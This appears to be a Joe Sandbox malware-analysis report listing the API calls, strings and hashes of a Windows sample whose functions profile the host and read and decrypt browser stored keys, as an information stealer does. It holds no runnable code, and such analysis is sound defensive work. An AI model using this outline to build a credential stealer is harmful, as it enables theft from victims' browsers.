                                                                                                                                                                                          • Opcode ID: 5ad15fdf4ef9934cbebd848b171a673bb717163ffc3550461997e621af8ff1e8
                                                                                                                                                                                          • Instruction ID: 658fada5508542f254f5e30ba37c437278507f81f45beaa0486eaef6f5c61cf3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ad15fdf4ef9934cbebd848b171a673bb717163ffc3550461997e621af8ff1e8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 65F06275600208FBFF115BA1EC5EFAE7A7DEB48709F5500A4F605EA0A1E7B199809730
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00030C1B,00030B58,?,?,?,00033E95,Windows: ,000568A0), ref: 00030BBD
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00030C1B,00030B58,?,?,?,00033E95,Windows: ,000568A0), ref: 00030BC4
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00056888,?,?,?,00030C1B,00030B58,?,?,?,00033E95,Windows: ,000568A0), ref: 00030BE2
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00056888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00030C1B,00030B58,?,?,?,00033E95,Windows: ), ref: 00030BFD
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00056888,?,?,?,00030C1B,00030B58,?,?,?,00033E95,Windows: ,000568A0), ref: 00030C06
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                          • String ID: CurrentBuildNumber
                                                                                                                                                                                          • API String ID: 3466090806-1022791448
                                                                                                                                                                                          • Opcode ID: 2f836020cc8545b78d2012706a95e89bbe9eaf8b2ffdc362c5a33ddd020b5c05
                                                                                                                                                                                          • Instruction ID: 6d522a472790c3b7b39de4407035d5dde24c80b69bcc72fbd43700b4d4e5d023
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f836020cc8545b78d2012706a95e89bbe9eaf8b2ffdc362c5a33ddd020b5c05
                                                                                                                                                                                          • Instruction Fuzzy Hash: DDF03675640208FBEF115B90EC4FFAE7A7DEB48705F150154F605A9091D6B15980D770
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 000356A4
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 000356C4
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 000356EA
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 000356F6
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00035725
                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00035738
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3891774339-0
                                                                                                                                                                                          • Opcode ID: 65b1b1eef90a6a89d5f8a203932ebf2f6a40421aeeed1c81a968df5e58564b03
                                                                                                                                                                                          • Instruction ID: a85bc405df8b476b5d60405ea161e7d8ba5f3d10a57a9cc9b891e7d3de2f5c8e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 65b1b1eef90a6a89d5f8a203932ebf2f6a40421aeeed1c81a968df5e58564b03
                                                                                                                                                                                          • Instruction Fuzzy Hash: A7419C7584002D9FCF15AB20FC8AEE977B9BB18309F5104E5B51CA3162EE715ED68FA0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                          • LocalFree.KERNEL32(0002ECBC,?,?,?,?,0002E756,?,?,?), ref: 0002802B
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2311089104-0
                                                                                                                                                                                          • Opcode ID: 54f620453bda81ed911a4669f1d6562f441540ef6e38858c28df574c5a20c6e2
                                                                                                                                                                                          • Instruction ID: a3618e326d9be162961380d8283e5e7a4d39fdaa867443405890016ccab4e6ea
                                                                                                                                                                                          • Opcode Fuzzy Hash: 54f620453bda81ed911a4669f1d6562f441540ef6e38858c28df574c5a20c6e2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B116D74901214FFDF619FA4EC8CEAE7BB8EB48740F204588F841E6150EB719E85DB21
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0003175E
                                                                                                                                                                                          • CoCreateInstance.OLE32(000531B0,00000000,00000001,0005AF60,?,00000018,00031901,?), ref: 00031781
                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 0003178E
                                                                                                                                                                                          • _wtoi64.MSVCRT ref: 000317C1
                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 000317DA
                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000317E1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 181426013-0
                                                                                                                                                                                          • Opcode ID: f558dbfd9f2333258645b2d56c011bb83dfbb6df44e276d380a4a36355a17f5d
                                                                                                                                                                                          • Instruction ID: 1a5ba02b232a6b67fe028d1b908ef75e4dec8693ff9cb02fbee31ce342bac424
                                                                                                                                                                                          • Opcode Fuzzy Hash: f558dbfd9f2333258645b2d56c011bb83dfbb6df44e276d380a4a36355a17f5d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 721146B0A0434ADFCB019FA4CC889EEBBBAAF49301F1440A9F605E72A1CB354945CB65
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 000316CE
                                                                                                                                                                                            • Part of subcall function 000323D5: malloc.MSVCRT ref: 000323DA
                                                                                                                                                                                            • Part of subcall function 000323D5: strncpy.MSVCRT ref: 000323EB
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 000316F6
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00056ECC,?,?,?,?,?), ref: 00031713
                                                                                                                                                                                          • GetCurrentHwProfileA.ADVAPI32(?), ref: 0003169F
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                                          • String ID: Unknown
                                                                                                                                                                                          • API String ID: 2781187439-1654365787
                                                                                                                                                                                          • Opcode ID: 9a1c289164a26e1fb434a88593a248e06d4292ad4b39ce49dd677e0a9af6d3e8
                                                                                                                                                                                          • Instruction ID: 1bc1ae2ef8a8b65d1a690878473dcef7ef9f07a642bca5c4f3be81a3c7a51616
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a1c289164a26e1fb434a88593a248e06d4292ad4b39ce49dd677e0a9af6d3e8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A110375900228ABDB21ABA4DC56BDE73BCAB18710F4004A5BA45E7152DA74AF848F54
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00056910,Display Resolution: ,000568F4,00000000,User Name: ,000568E4,00000000,Computer Name: ,000568D0,AV: ,000568C4,Install Date: ), ref: 00031131
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00031138
                                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00031154
                                                                                                                                                                                          • wsprintfA.USER32 ref: 0003117A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                          • String ID: %d MB
                                                                                                                                                                                          • API String ID: 3644086013-2651807785
                                                                                                                                                                                          • Opcode ID: 722938e9d9150f6fd56e9ae6c120de7673d51d80af9e863ba56b7325782cf14e
                                                                                                                                                                                          • Instruction ID: 813edfe89c271e05895ac310ccc952285df93e8e76457a69f1cfcde7f0bbf95e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 722938e9d9150f6fd56e9ae6c120de7673d51d80af9e863ba56b7325782cf14e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3101AE71A00218ABEB14DFB4DC49EFF77BCDF08700F450055F605EB191D67099418765
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 6C42C947
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C42C969
                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 6C42C9A9
                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C42C9C8
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C42C9E2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4191843772-0
                                                                                                                                                                                          • Opcode ID: 72cbaedc4c144eab83eba0cd87f14d0f8a044162151b3bfbfd41c03ef0a4c3be
                                                                                                                                                                                          • Instruction ID: 582d53d7b512274e140dc703e216eb5070fd718ecbf648f80983f89cb968174c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 72cbaedc4c144eab83eba0cd87f14d0f8a044162151b3bfbfd41c03ef0a4c3be
                                                                                                                                                                                          • Instruction Fuzzy Hash: D021C272782224ABEB14FE24D885FAE73B9EB46744F60011AF947E7B80DB6098048790
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AE8
                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AEE
                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AF4
                                                                                                                                                                                          • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00024B06
                                                                                                                                                                                          • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00024B0E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CrackInternetlstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1274457161-0
                                                                                                                                                                                          • Opcode ID: a1f721b88df60240ee8010bbdc2907b9c19d1b89118e23c63fa530901dc7b580
                                                                                                                                                                                          • Instruction ID: fdf4dbde795b4e1e6cf3efb4e3c57b3c85b138d7dfbe9e52d405f749c2175871
                                                                                                                                                                                          • Opcode Fuzzy Hash: a1f721b88df60240ee8010bbdc2907b9c19d1b89118e23c63fa530901dc7b580
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B011B32D00218ABDF149BA9EC49ADEBFB8AF55330F108216F925F72E0DA7456058B94
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ,0005692C), ref: 00030F65
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ,0005692C,Keyboard Languages: ,00056910), ref: 00030F6C
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00056888,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ), ref: 00030F8A
                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(00056888,00000000,00000000,00000000,000000FF,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000), ref: 00030FA6
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00056888,?,?,?,00034252,Processor: ,[Hardware],00056950,00000000,TimeZone: ,00056940,00000000,Local Time: ,0005692C,Keyboard Languages: ,00056910), ref: 00030FAF
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3466090806-0
                                                                                                                                                                                          • Opcode ID: 6d61617b92facd18da77ddccdd72a0ce3507e36d504d265840b2b588ca5b2420
                                                                                                                                                                                          • Instruction ID: e60956ad5393697ffa64e7db9e7118bc8b39a05eefc3da9de905c780e8e0416e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d61617b92facd18da77ddccdd72a0ce3507e36d504d265840b2b588ca5b2420
                                                                                                                                                                                          • Instruction Fuzzy Hash: DAF03075640208FFEF105B90FC0EFAE7B7CEB48705F1500A4F609A90A0E7B099909B70
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetEnvironmentVariableA.KERNELBASE(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0002DB0A), ref: 000283F2
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030549: lstrlenA.KERNEL32(?,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 0003054F
                                                                                                                                                                                            • Part of subcall function 00030549: lstrcpyA.KERNEL32(00000000,00000000,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 00030581
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(?,00057194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,000567C3,?,?,?,?,?,?,?,?,0002DB0A), ref: 00028447
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0002DB0A), ref: 0002845B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 000283E6, 000283EB, 00028405
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                          • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                          • API String ID: 2929475105-4027016359
                                                                                                                                                                                          • Opcode ID: 2bf83f40048c1de22465f0279a7e38dd8e977ca11d074763c6cb57669f0c35fc
                                                                                                                                                                                          • Instruction ID: afac77cffcd06072af3e5a3305be3fcc6d14c46bae0fad79ab7dfacacffa80bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bf83f40048c1de22465f0279a7e38dd8e977ca11d074763c6cb57669f0c35fc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A314C75901924EFDF12AB68FD0A4AE7BF4AB4C700B1241E5F80CA7122DB3159C1CFA1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00036DCD
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,0000001C), ref: 00036DD8
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036E5C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                                          • String ID: ERROR
                                                                                                                                                                                          • API String ID: 591506033-2861137601
                                                                                                                                                                                          • Opcode ID: 680ee33fc8a4fd1dbecfb935ca144a3f49d3e7480ec3036390d8bed2a4e29885
                                                                                                                                                                                          • Instruction ID: e3a81b435414b81e8be89a48185d4c53fc79590f76f4b14482939200326c6a4d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 680ee33fc8a4fd1dbecfb935ca144a3f49d3e7480ec3036390d8bed2a4e29885
                                                                                                                                                                                          • Instruction Fuzzy Hash: 51114C7190150AAFCB41FFB4D906AEDBBB4BF04310F504231E819A7562E731EAA58FD5
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002B3D7
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002B529
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002B544
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002B596
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 211194620-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                            • Part of subcall function 00031E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00036931,?), ref: 00031E37
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,?,00057538,0005688A), ref: 0002D49F
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002D4B2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                          • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                          • API String ID: 161838763-3310892237
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                            • Part of subcall function 00031E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00036931,?), ref: 00031E37
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0002CC90,?,?), ref: 000281E5
                                                                                                                                                                                            • Part of subcall function 00028048: CryptStringToBinaryA.CRYPT32(00026724,00000000,00000001,00000000,?,00000000,00000000), ref: 00028060
                                                                                                                                                                                            • Part of subcall function 00028048: LocalAlloc.KERNEL32(00000040,?,?,?,00026724,?), ref: 0002806E
                                                                                                                                                                                            • Part of subcall function 00028048: CryptStringToBinaryA.CRYPT32(00026724,00000000,00000001,00000000,?,00000000,00000000), ref: 00028084
                                                                                                                                                                                            • Part of subcall function 00028048: LocalFree.KERNEL32(?,?,?,00026724,?), ref: 00028093
                                                                                                                                                                                            • Part of subcall function 000280A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0002823B), ref: 000280C4
                                                                                                                                                                                            • Part of subcall function 000280A1: LocalAlloc.KERNEL32(00000040,0002823B,?,?,0002823B,0002CB95,?,?,?,?,?,?,?,0002CC90,?,?), ref: 000280D8
